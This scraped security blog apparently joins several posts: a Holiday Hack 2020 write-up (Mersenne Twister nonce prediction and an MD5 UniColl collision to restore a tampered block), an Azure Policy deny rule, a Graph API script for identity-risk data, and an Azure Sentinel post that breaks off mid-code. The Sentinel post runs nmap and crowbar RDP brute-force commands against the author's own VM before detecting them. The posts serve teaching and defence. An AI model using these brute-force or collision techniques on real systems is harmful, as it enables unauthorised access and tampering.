    save_chain(<filename>) - saves the chain to the filename provided, or to "blockchain.dat" if
    no filename is given.

    load_chain(<filename>) - loads a chain from the filename provided, or from "blockchain.dat" if
    no filename is given. This returns the count of blocks loaded. This DOES NOT verify that the
    data loaded is a valid blockchain. It is recommended to call verify_chain() immediately after
    loading a new chain.   

An overview of how we process the Official Naughty/Nice Blockchain:

There are approximately 7.8 billion people and magical beings on Earth, and each one is tracked
24 hours a day throughout the year by a fleet of Elves-On-The-Shelves. While those elves are
clearly visible during the Holiday season, don't be fooled into believing that we're only tracking
Naughty/Niceness at that time. On average, each of the billions of subjects that we monitor are
performing some sort of Naughty or Nice activity that rises to the level of being scored on the
blockchain around 2.1 times per week. Keeping track of all of that activity on a single blockchain
would be incredibly processing intensive (that would be ~1^12 blocks/year, or 32,000 blocks/second),
so we've broken our record-keeping into 1,000 different blockchains. If you do the math, you'll find
that each of the blockchains is now responsible for between 1,500 and 2000 blocks per minute, which
is a reasonable load. A separate database keeps track of which Personal ID (pid) is assigned to each
of the blockchains.

Throughout the year, we periodically run each of the chains to determine who is the best (and worst)
of our subjects. While only the final Holiday run is used to determine who is getting something
good in their stockings and who is getting a lump of coal, it's always interesting to see a listing
of the Nicest and Naughtiest folks out there. 

Please note: Wagering on the results of the Official Naughty/Nice Blockchain is STRICTLY PROHIBITED.

If you intend to use your access to the Official Naughty/Nice Blockchain code to facilitate any sort
of gambling, you will be racking up a whole bunch of Naughtiness points. YOU HAVE BEEN WARNED! (I'm
looking at you, Alabaster Snowball...)

For this reason, we have not provided any code that will perform a computation of Naughty/Nice
points. Additionally, for privacy reasons, there is also no code to pull the records associated
with specific individuals from this list. While the creation of that code would not be difficult,
you are honor-bound to use your access to this list for only good and noble purposes.

Signing Keys - Information

We have provided you with an example private key that you can use when generating your own blockchains
for test purposes. This private key (which also contains the public key information) is called 
private.pem.

Additionally, we have provided you with a copy of the public key used to verify the Official
Naughty/Nice Blockchain. This is the public key component of the private key used by the Official
Santa Signature System (OS3) to sign blocks on the Official Naughty/Nice Blockchain. This key
is contained in the file official_public.pem.
'''

import random
from Crypto.Hash import MD5, SHA256
from Crypto.PublicKey import RSA
from Crypto.Signature import PKCS1_v1_5
from base64 import b64encode, b64decode
import binascii
import time
import itertools
from mt19937predictor import MT19937Predictor

genesis_block_fake_hash = '00000000000000000000000000000000'

data_types = {1:'plaintext', 2:'jpeg image', 3:'bmp image', 4:'gif image', 5:'PDF', 6:'Word', 7:'PowerPoint', 8:'Excel', 9:'tiff image', 10:'MP4 video', 11:'MOV video', 12:'WMV video', 13:'FLV video', 14:'AVI video', 255:'Binary blob'}
data_extension = {1:'txt', 2:'jpg', 3:'bmp', 4:'gif', 5:'pdf', 6:'docx', 7:'pptx', 8:'xlsx', 9:'tiff', 10:'mp4', 11:'mov', 12:'wmv', 13:'flv', 14:'avi', 255:'bin'}

Naughty = 0
Nice = 1

class Block():
    def __init__(self, index=None, block_data=None, previous_hash=None, load=False, genesis=False):
        if(genesis == True):
            return None
        else:
            self.data = []
            if(load == False):
                if all(p is not None for p in [index, block_data['documents'], block_data['pid'], block_data['rid'], block_data['score'], block_data['sign'], previous_hash]):
                    self.index = index
                    if self.index == 0:
                        self.nonce = 0 # genesis block
                    else:
                        self.nonce = random.randrange(0xFFFFFFFFFFFFFFFF)
                    self.data = block_data['documents']
                    self.previous_hash = previous_hash
                    self.doc_count = len(self.data)
                    self.pid = block_data['pid']
                    self.rid = block_data['rid']
                    self.score = block_data['score']
                    self.sign = block_data['sign']
                    now = time.gmtime()
                    self.month = now.tm_mon
                    self.day = now.tm_mday
                    self.hour = now.tm_hour
                    self.minute = now.tm_min
                    self.second = now.tm_sec
                    self.hash, self.sig = self.hash_n_sign()
                else:
                    return None

    def __eq__(self, other):
        if isinstance(other, self.__class__):
            return self.__dict__ == other.__dict__
        else:
            return False

    def __repr__(self):
        s = 'Chain Index: %i\n' % (self.index)
        s += '              Nonce: %s\n' % ('%016.016x' % (self.nonce))
        s += '                PID: %s\n' % ('%016.016x' % (self.pid))
        s += '                RID: %s\n' % ('%016.016x' % (self.rid))
        s += '     Document Count: %1.1i\n' % (self.doc_count)
        s += '              Score: %s\n' % ('%08.08x (%i)' % (self.score, self.score))
        n_n = 'Naughty'
        if self.sign > 0:
            n_n = 'Nice'
        s += '               Sign: %1.1i (%s)\n' % (self.sign, n_n)
        c = 1
        for d in self.data:
            s += '         Data item: %i\n' % (c)
            s += '               Data Type: %s (%s)\n' % ('%02.02x' % (d['type']), data_types[d['type']])
            s += '             Data Length: %s\n' % ('%08.08x' % (d['length']))
            s += '                    Data: %s\n' % (binascii.hexlify(d['data']))
            c += 1
        s += '               Date: %s/%s\n' % ('%02.02i' % (self.month), '%02.02i' % (self.day))
        s += '               Time: %s:%s:%s\n' % ('%02.02i' % (self.hour), '%02.02i' % (self.minute), '%02.02i' % (self.second))
        s += '       PreviousHash: %s\n' % (self.previous_hash)
        s += '  Data Hash to Sign: %s\n' % (self.hash)
        s += '          Signature: %s\n' % (self.sig)
        return(s)

    def full_hash(self):
        hash_obj = MD5.new()
        hash_obj.update(self.block_data_signed())
        return hash_obj.hexdigest()

    def hash_n_sign(self):
        hash_obj = MD5.new()
        hash_obj.update(self.block_data())
        signer = PKCS1_v1_5.new(private_key)
        return (hash_obj.hexdigest(), b64encode(signer.sign(hash_obj)))

    def block_data(self):
        s = (str('%016.016x' % (self.index)).encode('utf-8'))
        s += (str('%016.016x' % (self.nonce)).encode('utf-8'))
        s += (str('%016.016x' % (self.pid)).encode('utf-8'))
        s += (str('%016.016x' % (self.rid)).encode('utf-8'))
        s += (str('%1.1i' % (self.doc_count)).encode('utf-8'))
        s += (str(('%08.08x' % (self.score))).encode('utf-8'))
        s += (str('%1.1i' % (self.sign)).encode('utf-8'))
        for d in self.data:
            s += (str('%02.02x' % d['type']).encode('utf-8'))
            s += (str('%08.08x' % d['length']).encode('utf-8'))
            s += d['data']
        s += (str('%02.02i' % (self.month)).encode('utf-8'))
        s += (str('%02.02i' % (self.day)).encode('utf-8'))
        s += (str('%02.02i' % (self.hour)).encode('utf-8'))
        s += (str('%02.02i' % (self.minute)).encode('utf-8'))
        s += (str('%02.02i' % (self.second)).encode('utf-8'))
        s += (str(self.previous_hash).encode('utf-8'))
        return(s)

    def block_data_signed(self):
        s = self.block_data()
        s += bytes(self.hash.encode('utf-8'))
        s += self.sig
        return(s)

    def load_a_block(self, fh):
        self.index = int(fh.read(16), 16)
        self.nonce = int(fh.read(16), 16)
        self.pid = int(fh.read(16), 16)
        self.rid = int(fh.read(16), 16)
        self.doc_count = int(fh.read(1), 10)
        self.score = int(fh.read(8), 16)
        self.sign = int(fh.read(1), 10)
        count = self.doc_count
        while(count > 0):
            l_data = {}
            l_data['type'] = int(fh.read(2),16)
            l_data['length'] = int(fh.read(8), 16)
            l_data['data'] = fh.read(l_data['length'])
            self.data.append(l_data)
            count -= 1
        self.month = int(fh.read(2))
        self.day = int(fh.read(2))
        self.hour = int(fh.read(2))
        self.minute = int(fh.read(2))
        self.second = int(fh.read(2))
        self.previous_hash = str(fh.read(32))[2:-1]
        self.hash = str(fh.read(32))[2:-1]
        self.sig = fh.read(344)
        return self

    def create_genesis_block(self):
        block_data = {}
        documents = []
        doc = {}
        doc['data'] = bytes('Genesis Block'.encode('utf-8'))
        doc['type'] = 1
        doc['length'] = len(doc['data'])
        documents.append(doc)
        block_data['documents'] = documents
        block_data['pid'] = 0
        block_data['rid'] = 0
        block_data['score'] = 0
        block_data['sign'] = Nice
        b = Block(0, block_data, genesis_block_fake_hash)
        return b

    def verify_types(self):  # check data types of all info in a block
        rv = True
        instances = [self.index, self.nonce, self.pid, self.rid, self.month, self.day, self.hour, self.minute, self.second, self.previous_hash, self.score, self.sign]
        types = [int, int, int, int, int, int, int, int, int, str, int, int]
        if not sum(map(lambda inst_, type_: isinstance(inst_, type_), instances, types)) == len(instances):
            rv = False
        for d in self.data:
            if not isinstance(d['type'], int):
                rv = False
            if not isinstance(d['length'], int):
                rv = False
            if not isinstance(d['data'], bytes):
                rv = False
        return rv

    def dump_doc(self, doc_no):
        filename = '%s.%s' % (str(self.index), data_extension[self.data[doc_no - 1]['type']])
        with open(filename, 'wb') as fh:
            d = self.data[doc_no - 1]['data']
            fh.write(d)
        print('Document dumped as: %s' % (filename))


class Chain():
    nonce_list = [] 
    index = 0
    initial_index = 0
    last_hash_value = ''
    def __init__(self, load=False, filename=None):
        if not load:
            self.blocks = [Block(genesis=True).create_genesis_block()]
            self.last_hash_value = self.blocks[0].full_hash()
        else:
            self.blocks = []
            self.load_chain(filename)
            self.index = self.blocks[-1].index
            self.initial_index = self.blocks[0].index

    def __eq__(self, other):
        if isinstance(other, self.__class__):
            return self.__dict__ == other.__dict__
        else:
            return False

    def add_block(self, block_data):
        self.index += 1
        b = Block(self.index, block_data, self.last_hash_value)
        self.blocks.append(b)
        self.last_hash_value = b.full_hash() 

    def verify_chain(self, publickey, previous_hash=None):
        flag = True
        # unless we're explicitly told what the initial last hash should be, we assume that
        # the initial block will be the genesis block and will have a fixed previous_hash
        if previous_hash is None:
            previous_hash = genesis_block_fake_hash
        for i in range(0, len(self.blocks)):  # assume Genesis block integrity
            block_no = self.blocks[i].index
            if not self.blocks[i].verify_types():
                flag = False
                print(f'\n*** WARNING *** Wrong data type(s) at block {block_no}.')
            if self.blocks[i].index != i + self.initial_index:
                flag = False
                print(f'\n*** WARNING *** Wrong block index at what should be block {i + self.initial_index}: {block_no}.')
            if self.blocks[i].previous_hash != previous_hash:
                flag = False
                print(f'\n*** WARNING *** Wrong previous hash at block {block_no}.')
            hash_obj = MD5.new()
            hash_obj.update(self.blocks[i].block_data())
            signer = PKCS1_v1_5.new(publickey)
            if signer.verify(hash_obj, b64decode(self.blocks[i].sig)) is False:
                flag = False
                print(f'\n*** WARNING *** Bad signature at block {block_no}.')
            if flag == False:
                print(f'\n*** WARNING *** Blockchain invalid from block {block_no} onward.\n')
                return False
            previous_hash = self.blocks[i].full_hash()
        return True

    def save_a_block(self, index, filename=None):
        if filename is None:
            filename = 'block.dat'
        with open(filename, 'wb') as fh:
            fh.write(self.blocks[index].block_data_signed())

    def save_chain(self, filename=None):
        if filename is None:
            filename = 'blockchain.dat'
        with open(filename, 'wb') as fh:
            i = 0
            while(i < len(self.blocks)):
                fh.write(self.blocks[i].block_data_signed())
                i += 1

    def load_chain(self, filename=None):
        count = 0
        if filename is None:
            filename = 'blockchain.dat'
        with open(filename, 'rb') as fh:
            while(1):
                try:
                    self.blocks.append(Block(load=True).load_a_block(fh))
                    self.index = self.blocks[-1].index
                    count += 1
                except ValueError:
                    return count

if __name__ == '__main__':
    with open('private.pem', 'rb') as fh:
        private_key = RSA.importKey(fh.read())
    public_key = private_key.publickey()
    c1 = Chain()
    for i in range(9):
        block_data = {}
        documents = []
        doc = {}
        doc['data'] = bytes(('This is block %i of the naughty/nice blockchain.' % (i)).encode('utf-8'))
        doc['type'] = 1
        doc['length'] = len(doc['data'])
        documents.append(doc)
        block_data['documents'] = documents
        block_data['pid'] = 123 # this is the pid, or "person id," that the block is about
        block_data['rid'] = 456 # this is the rid, or "reporter id," of the reporting elf
        block_data['score'] = 100 # this is the Naughty/Nice score of the report
        block_data['sign'] = Nice # this indicates whether the report is about naughty or nice behavior
        c1.add_block(block_data)
    print(c1.blocks[3])
    print('C1: Block chain verify: %s' % (c1.verify_chain(public_key)))

#Note: This is how you would load and verify a blockchain contained in a file called blockchain.dat
#
    with open('official_public.pem', 'rb') as fh:
        official_public_key = RSA.importKey(fh.read())
    c2 = Chain(load=True, filename='blockchain.dat')
    print('C2: Block chain verify: %s' % (c2.verify_chain(official_public_key)))
    print(c2.blocks[0])
    c2.blocks[0].dump_doc(1)


    predictor = MT19937Predictor()
    nonce_list= []
    # Adding all the nonces of all the blocks in a list
    for i in range(len(c2.blocks)):
         nonce_list.append(c2.blocks[i].nonce)
 
    # reverse the list
    nonce_list.reverse()
    # get the first 625 nonces
    last_625_block_nonce = list(itertools.islice(nonce_list,625))
    # reverse the list so we get the last 625 nonces
    last_625_block_nonce.reverse()

    # feed the 625 nonces to the MT19937Predictor
    for nonce in last_625_block_nonce:
        predictor.setrandbits(nonce, 64)

    # calculated nonce for block 12997 [literally ran the code at this point and used predictor.getrandbits(64) to get it]
    predictor.setrandbits(13205885317093879758, 64)
    # calculated nonce for block 12998, obtained the same way
    predictor.setrandbits(109892600914328301, 64)
    # calculated nonce for block 12999, obtained the same way
    predictor.setrandbits(9533956617156166628, 64)
    # Get the nonce for block 13000
    print(predictor.getrandbits(64))

Determine and extract the original naughty document:

Below is part of the 129459.pdf – Jack’s document (obviously a nice one!)

Nice document for Jack Frost

Open the file 129459.pdf in an online hex editor [https://hexed.it/] and make the changes (see right side)
Ref: https://speakerdeck.com/ange/colltris?slide=194

PDF which Jack Frost had (left, the nice list) and the recovered PDF (right, the naughty list)

Save the changes as a different PDF file. Open it and you see a different PDF: the naughty list, the original one meant for Jack Frost.

The naughty list for Jack Frost

Determine the flag for naughty/nice in Jack’s block :

Open Jack’s block file in the online hex editor and compare the text version of the block to find the naughty/nice flag.
Jack must have changed this from 0 (the original value, meaning naughty) to 1 (nice).

The position of the naughty nice flag in the hex for the PDF

Determine the 3rd and 4th bytes which were changed by Jack :

At this point, we have two bytes identified – one for the PDF page number and another for the naughty/nice flag.

The 3rd and 4th bytes identified

Following the UniColl computation technique as noted in https://speakerdeck.com/ange/colltris?slide=109 :
The 1st byte – the naughty/nice flag, which we decrease by 1 (31 to 30)
The 2nd byte – the 10th byte of the next MD5 block, which we increase by 1 (D6 to D7)
The 3rd byte – the PDF page number, which we increase by 1 (32 to 33)
The 4th byte – the 10th byte of its next MD5 block, which we decrease by 1 (1C to 1B)

Please see the screenshot below for all the changes:
left side is Jack’s block (block.dat)
right side is the original block which Jack changed (block_restored.dat) – changes in bytes noted below.

Jack’s block (left) and the restored original block which Jack changed (right). Remember, the MD5 for both is still the same!

Jack was able to change the original block without changing the hash; his block’s MD5 hash was b10b4a6bd373b61f32f4fd3a0cdfbf84.
We needed to undo his changes and restore the original block, again without changing the MD5 hash.
As you can see with the changes below, the hash still does not change.

MD5 Hash of Jack’s block (block.dat) – b10b4a6bd373b61f32f4fd3a0cdfbf84

MD5 Hash of the restored original block (block_restored.dat) – b10b4a6bd373b61f32f4fd3a0cdfbf84
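The four byte edits can also be applied programmatically. A hedged sketch (the offsets below are placeholders; the real positions come from the hex-editor comparison in the screenshots, not from this post’s text):

```python
import hashlib
import os

def apply_edits(block_bytes, edits):
    """Return a copy of block_bytes with the byte at each offset adjusted by delta (mod 256)."""
    out = bytearray(block_bytes)
    for offset, delta in edits.items():
        out[offset] = (out[offset] + delta) % 256
    return bytes(out)

# PLACEHOLDER offsets -- substitute the positions found in the hex editor.
# The deltas follow the UniColl pattern described above.
EDITS = {
    0x109: -1,  # naughty/nice flag: 0x31 -> 0x30
    0x149: +1,  # 10th byte of the following MD5 block: 0xD6 -> 0xD7
    0x209: +1,  # PDF page selector: 0x32 -> 0x33
    0x249: -1,  # 10th byte of its following MD5 block: 0x1C -> 0x1B
}

if os.path.exists('block.dat'):
    data = open('block.dat', 'rb').read()
    restored = apply_edits(data, EDITS)
    open('block_restored.dat', 'wb').write(restored)
    # with the true UniColl offsets, both digests are identical
    print(hashlib.md5(data).hexdigest())
    print(hashlib.md5(restored).hexdigest())
```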

Now we just need to save the changes in a new file block_restored.dat and calculate the SHA256 hash of it.
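The final answer is then just the SHA256 of the restored file, which can be computed with the stdlib hashlib, for example:

```python
import hashlib
import os

def sha256_of_file(path):
    """SHA256 of a file's raw bytes, read in chunks."""
    h = hashlib.sha256()
    with open(path, 'rb') as fh:
        for chunk in iter(lambda: fh.read(8192), b''):
            h.update(chunk)
    return h.hexdigest()

if os.path.exists('block_restored.dat'):
    print(sha256_of_file('block_restored.dat'))
```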

 SHA256 of the block_restored.dat

fff054f33c2134e0230efb29dad515064ac97aa8c68d33c58c01213a0d408afb

SHA256 of the restored block – fff054f33c2134e0230efb29dad515064ac97aa8c68d33c58c01213a0d408afb

The below zip file contains the changed naughty_nice.py (please remove .txt after extraction)

All objectives are completed now

All narratives have been unlocked

The best part!

After completing all the objectives, you go to Santa’s office.
Tinsel Upatree says “Quickly go out to the balcony to be recognized”!!

You go to the roof, and congratulations are in order!!!!

Jack’s plan is foiled!

The exclusive winner hoodie :

I got myself the exclusive Holiday Hack challenge 2020 winner hoodie!


Azure Policy – Deny creation of virtual machines without IP restriction across all Azure subscriptions

TLDR;

Public Azure virtual machines without any IP restriction are a perennial attack vector which may result in compromise of the VM and further lateral movement in the Azure infrastructure.
Azure Policy can be used to deny any attempt to create a virtual machine without an IP restriction.
This blog post gives a step-by-step process for implementing an Azure policy across ALL your subscriptions covering IP restriction for ALL your future virtual machines.

What is Azure policy:

Azure Policy is a service inside Azure that enables configuration management. It executes every time a new resource is added or an existing resource is changed. A policy consists of a set of rules and a set of actions; Azure Policy can report the event as non-compliant, or even deny the action altogether, if the rules are not matched.

Azure Policy is an excellent way to enforce and bake security and compliance into the Azure infrastructure.
As you see in the picture below, Azure Policy is an integral part of Azure Governance – mainly consisting of Policy Definitions and a Policy Engine, which work directly with Azure Resource Manager (ARM).

image 
Image source : https://www.microsoft.com/en-us/us-partner-blog/2019/07/24/azure-governance/

Summary:

If Azure virtual machines need to be accessible over the internet, it is important to restrict access ONLY to your corporate public IP addresses.
This helps in a couple of situations:
a) Limiting external access by an attacker.
b) Limiting insider threat or misuse by an employee.
The IP address restriction can be configured while creating the virtual machine, using network security groups.
However, enforcing this at the policy level ensures we are not dependent on each individual team’s best judgment.

Process:

As a best practice, always test the policy in audit mode before switching to deny mode. In this walkthrough, we will follow the steps below:

1) Create the policy definition.
2) Apply the policy (policy assignment) in audit mode.
3) Test in audit mode.
4) Apply the policy (policy assignment) in deny mode.
5) Test in deny mode.

Create the policy definition

On the search bar, search for “policy” and click on it.

image

Click Definitions and then click Policy Definition

image

Click the … button under “Definition Location” to select the management group. If you want to apply this policy to all subscriptions, don’t select any subscription.
To apply this policy to a specific subscription, select the desired subscription under the subscription dropdown.

image

Policy Details:

Name:
Deny creation of virtual machine without access restricted only from company’s public IP addresses
(on-prem/VPN)

Description (Change the IP address list below):
Deny creation of virtual machine which does not have external company IP addresses restriction in the network security group.
One or more of the below corporate IP addresses must be specified in the network security group when creating the virtual machine. Otherwise, the validation will fail and the virtual machine will not be created.
Below is the valid public corporate IP addresses list :
208.114.51.253
104.104.51.253
108.104.51.253

Category : Network
image 
Policy Rule:

{
  "mode": "All",
  "policyRule": {
    "if": {
      "allOf": [
        {
          "field": "type",
          "equals": "Microsoft.Network/networkSecurityGroups"
        },
        {
          "count": {
            "field": "Microsoft.Network/networkSecurityGroups/securityRules[*]",
            "where": {
              "allOf": [
                {
                  "anyOf": [
                    {
                      "field": "Microsoft.Network/networkSecurityGroups/securityRules[*].sourceAddressPrefix",
                      "notIn": [
                        "208.114.51.253",
                        "104.104.51.253",
                        "108.104.51.253"
                      ]
                    }
                  ]
                }
              ]
            }
          },
          "greater": 0
        }
      ]
    },
    "then": {
      "effect": "[parameters('effect')]"
    }
  },
  "parameters": {
    "effect": {
      "type": "String",
      "metadata": {
        "displayName": "Effect",
        "description": "The effect determines what happens when the policy rule is evaluated to match"
      },
      "allowedValues": [
        "audit",
        "deny"
      ],
      "defaultValue": "audit"
    }
  }
}
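To make the rule's logic concrete, here is a minimal offline sketch in Python of what the policy evaluates: an NSG is non-compliant if the count of security rules whose sourceAddressPrefix is not in the approved list is greater than 0. The field names are illustrative; the real evaluation happens inside Azure Policy.

```python
# Approved corporate IPs from the policy definition above.
ALLOWED_SOURCE_IPS = {"208.114.51.253", "104.104.51.253", "108.104.51.253"}

def is_compliant(security_rules):
    """Mirror the policy's count/notIn/greater-than-0 logic.

    `security_rules` is a list of dicts shaped like the securityRules[*]
    alias the policy counts over (hypothetical shape for illustration).
    """
    offending = [rule for rule in security_rules
                 if rule.get("sourceAddressPrefix") not in ALLOWED_SOURCE_IPS]
    # Any rule with a non-approved source prefix makes the NSG non-compliant.
    return len(offending) == 0

rules = [
    {"name": "allow-rdp-corp", "sourceAddressPrefix": "208.114.51.253"},
    {"name": "allow-rdp-any", "sourceAddressPrefix": "*"},
]
print(is_compliant(rules))       # False: the "*" rule is not approved
print(is_compliant(rules[:1]))   # True: only the corporate IP rule remains
```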

Policy Assignment

Under policy > definition, go to the newly created policy definition.
image

Click Assign.

image

Provide an assignment name and description
Name:
Deny creation of virtual machine without access restricted only from company’s public IP addresses
(on-prem/VPN)

Description (Change the IP address list below):
Deny creation of a virtual machine whose network security group does not restrict access to the company's external IP addresses.
One or more of the corporate IP addresses below must be specified in the network security group when creating the virtual machine; otherwise, validation fails and the virtual machine is not created.
Below is the list of valid public corporate IP addresses:
208.114.51.253
104.104.51.253
108.104.51.253

image

Under “Parameters” tab, select “audit” in the Effect dropdown and click “Review+Create”

image

On the review page, click “Create” .

image

The policy assignment is created. Note that it takes about 30 minutes to take effect.

image

 

Test 1 – Audit mode :
Create virtual machine with RDP allowed from any external IP Address

With the policy in Audit mode, let us create a new virtual machine with RDP open to any external IP address.

image

image

image
When the policy is in audit mode, the virtual machine is created successfully, but Azure Policy adds a Microsoft.Authorization/policies/audit/action operation to the activity log and marks the resource as non-compliant.

Activity Logs:
image

Compliance State:
Policy > Compliance
image

Test 2 – Deny mode
Create virtual machine with RDP allowed from any external IP Address

We need to change the effect mode to “deny” in our policy assignment.
Head over to Policy > Assignments > Click on the policy we created

image
Click “Parameters” tab. Select “deny” from the dropdown and continue to save the policy assignment.

image

Attempt to create a virtual machine with the same settings as we did before.
image

When you proceed to create the virtual machine, the final validation will fail with an error message which, when clicked, shows which policy disallowed the action.

image

Clicking on the policy would show the policy assignment with details showing why the policy disallowed this action.

image

When the policy is in deny mode, the virtual machine creation fails, and Azure Policy adds a Microsoft.Authorization/policies/deny/action operation to the activity log.

Under activity logs, you can see the deny action:
image

image

Summary :

Azure Policy is an excellent way of enforcing compliance in Azure infrastructure. In this blog post we saw how to apply an Azure Policy that denies creation of virtual machines without source IP restrictions.
Further reading:
Azure policy docs : https://docs.microsoft.com/en-us/azure/governance/policy/overview
Azure policy Github : https://github.com/Azure/azure-policy


Detection of identity-based risks using Azure AD Identity Protection and Graph API

Github repository : https://github.com/ashishmgupta/AzureADIdentityProtection

image

What is Azure AD Identity Protection?
Identity Protection is a tool in Azure AD that allows organizations to accomplish three key tasks:

  • Automate the detection and remediation of identity-based risks.
  • Investigate risks using data in the portal.
  • Export risk detection data to third-party utilities for further analysis.

Identity Protection identifies risks in the following classifications:

  • Atypical travel : Sign-in from an atypical location based on the user’s recent sign-ins.
  • Anonymous IP address : Sign-in from an anonymous IP address (for example: Tor browser, anonymizer VPNs).
  • Unfamiliar sign-in properties : Sign-in with properties we’ve not seen recently for the given user.
  • Malware linked IP address : Sign-in from a malware-linked IP address.
  • Leaked credentials : Indicates that the user’s valid credentials have been leaked.
  • Azure AD threat intelligence : Microsoft’s internal and external threat intelligence sources have identified a known attack pattern.

Source :https://docs.microsoft.com/en-us/azure/active-directory/identity-protection/overview-identity-protection

Note : Azure AD Identity Protection is only fully available in Azure AD Premium P2.

In this blog post, we will focus on detection of the above identity based risks.

There are two steps :
1) From the Azure portal, set up the application (with a client secret) and configure permissions to read data from Identity Protection.
2) Use a Python script to call the Graph API with the OAuth token, pull the Identity Protection data, and ingest it into your SIEM tool.

Setting up the application in the Azure portal
Azure Active Directory > App Registrations > New Registration

image

Give the application a name.

image

Add API permissions.
API Permission > Add a permission

image

Click Microsoft Graph

image

Since we want the logs from an application rather than a user, select Application permissions.

image

Now, there are three APIs, and each needs specific permissions so we can access its data via the Graph API.

  • Sign-ins : Query the Graph API for Azure AD sign-ins with properties related to risk state, detail and level. Requires AuditLog.Read.All and Directory.Read.All.
  • Risky users : Get users identified by Identity Protection as risky. Requires IdentityRiskyUser.Read.All.
  • Risk detections : Get both user-linked and sign-in-linked risk detections and associated information. Requires IdentityRiskEvent.Read.All.

The above API permissions need to be set under Microsoft Graph as shown below.

image image
image image

The Global Administrator of your tenant needs to grant admin consent for the permissions you added.
You should contact them for this and get the consent granted.

image

Create a new client secret.

Certificate and Secrets > New Client Secret

image

image

A secret is automatically generated and can be copied.

image

Python script to use Graph API to pull Identity Protection data
Below is a screenshot of a section of the Python code, which uses the client ID, client secret and tenant domain to obtain an OAuth token, and then uses that token to query the Microsoft Graph API for the Identity Protection data in JSON format for both risky users and risk detections.

Full source code is located here :
https://github.com/ashishmgupta/AzureADIdentityProtection

The code also retries when the request rate crosses the throttling threshold (HTTP 429 Too Many Requests).
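The flow can be sketched as below. This is a hedged sketch of the approach, not the repo's exact code: a client-credentials OAuth grant against Azure AD, then a call to the Graph v1.0 riskyUsers endpoint with a retry on HTTP 429 that honors the Retry-After header.

```python
import json
import time
import urllib.error
import urllib.parse
import urllib.request

TOKEN_URL = "https://login.microsoftonline.com/{tenant}/oauth2/v2.0/token"
RISKY_USERS_URL = "https://graph.microsoft.com/v1.0/identityProtection/riskyUsers"

def token_request_body(client_id, client_secret):
    """Form-encoded body for the OAuth2 client-credentials grant."""
    return urllib.parse.urlencode({
        "client_id": client_id,
        "client_secret": client_secret,
        "scope": "https://graph.microsoft.com/.default",
        "grant_type": "client_credentials",
    })

def retry_delay(headers, attempt):
    """Honor a Retry-After header on HTTP 429, else back off exponentially."""
    retry_after = headers.get("Retry-After")
    return int(retry_after) if retry_after else 2 ** attempt

def get_risky_users(tenant, client_id, client_secret, max_attempts=5):
    """Fetch riskyUsers from Microsoft Graph, retrying when throttled."""
    body = token_request_body(client_id, client_secret).encode()
    with urllib.request.urlopen(TOKEN_URL.format(tenant=tenant), body) as resp:
        token = json.load(resp)["access_token"]
    request = urllib.request.Request(
        RISKY_USERS_URL, headers={"Authorization": "Bearer " + token})
    for attempt in range(max_attempts):
        try:
            with urllib.request.urlopen(request) as resp:
                return json.load(resp)["value"]
        except urllib.error.HTTPError as err:
            if err.code != 429:
                raise
            time.sleep(retry_delay(err.headers, attempt))
    raise RuntimeError("still throttled after %d attempts" % max_attempts)
```

The same pattern works for the riskDetections endpoint; only the URL changes.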

image

Hope this post helps you implement and query the Azure Identity Protection data in your organization.
Please feel free to ask questions in the comments section below.


Azure Sentinel – Detecting brute force RDP attempts

Azure Sentinel is a cloud-based SIEM* and SOAR** solution.
As it's still in preview, I wanted to test out a few of its capabilities.
In this post we will see how we can detect RDP brute-force attempts and respond using automated playbooks in Azure Sentinel.
[*SIEM : Security Information and Event Management]
[**SOAR : Security Orchestration, Automation and Response]

image
https://docs.microsoft.com/en-us/azure/sentinel/overview

The infrastructure:

I have a couple of virtual machines in Azure which have RDP open (sure, I am the first one to keep that open) 🙂 Below is one of the Windows Server 2012 machines.

image

The Attack:

Attackers typically scan a whole CIDR range to find the services running on the machines in that range. In this example, simulating such a scan, I will use only one machine (the one above) from the Kali VM to check whether RDP (port 3389) is open.

nmap -Pn -p 3389 IPAddress

image

For brute-force, we will use crowbar.
Clone the repository:
git clone https://github.com/galkan/crowbar.git
image

I have separate files for usernames(userlist) and passwords(passwordlist) which will be used by Crowbar in combination to attempt to login to the above machine via RDP.

python crowbar.py -b rdp -s ipaddress -U userlist -C passwordlist -v
-b indicates the target service. In this case it's rdp, but crowbar also supports openvpn, sshkey and vnckey.
-v indicates verbose output.

The combination marked “RDP-SUCCESS” is the username and password pair that was brute-forced for a successful login via RDP; the other attempts failed. Of course, I have the right username and password in the file. 🙂
 
image

Azure Sentinel

Now let's get to Azure Sentinel. As noted above, it's a cloud-based SIEM.
You can quickly locate “Azure Sentinel” from the search bar.
image

Sentinel manages all its data in a Log Analytics workspace. If you already have one, you can reuse it or create a new one.

image

One of the first things you notice in Azure Sentinel is the number of built-in data connectors available to collect data from different sources. These include not only Azure-native data sources such as Azure AD, Office 365 and Security Center, but also third parties like Palo Alto, Cisco ASA, Check Point, Fortinet and F5.
Pretty sure the list will only get longer.

For the purpose of this blog post, we will focus on the “Security Events” by clicking on “Configure”.

image

Select “All events”.
Click on “Download install Agent for Windows Virtual machines”.
Select the Virtual machine where the agent will be installed.
Click “Connect”.
The “Connect” process takes a few minutes to complete.

image

image

image

When the machine shows “Connected” in the Azure portal, you will see the Microsoft Monitoring Agent (MMA) service running on the machine, which uploads the logs to the Azure Sentinel workspace for the subscription.

image

Start writing some queries

Azure Sentinel uses the Kusto Query Language for read-only requests to process data and return results.
In the Sentinel workspace, click on “Logs” and use the below query, which looks for security events with successful logins (EventID 4624) and failed logins (EventID 4625) originating from a workstation named “kali”.
Note the highlighted event was the only successful attempt (EventID 4624); the rest were failures (4625).

SecurityEvent
| where (EventID == 4625 or EventID == 4624) and WorkstationName == "kali"
| project TimeGenerated, EventID, WorkstationName, Computer, Account, LogonTypeName, IpAddress
| order by TimeGenerated desc
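If you export these events, the same filter can be sketched in Python. The dict keys mirror the SecurityEvent columns in the query above; the sample events are hypothetical.

```python
# Reproduce the KQL filter over exported SecurityEvent rows:
# keep 4624/4625 events from the "kali" workstation, newest first.
def rdp_logon_events(events, workstation="kali"):
    hits = [e for e in events
            if e["EventID"] in (4624, 4625)
            and e["WorkstationName"] == workstation]
    return sorted(hits, key=lambda e: e["TimeGenerated"], reverse=True)

events = [
    {"TimeGenerated": "2019-06-01T10:00:00Z", "EventID": 4625,
     "WorkstationName": "kali", "Account": "victim\\admin"},
    {"TimeGenerated": "2019-06-01T10:05:00Z", "EventID": 4624,
     "WorkstationName": "kali", "Account": "victim\\admin"},
    {"TimeGenerated": "2019-06-01T10:06:00Z", "EventID": 4624,
     "WorkstationName": "corp-pc", "Account": "victim\\alice"},
]
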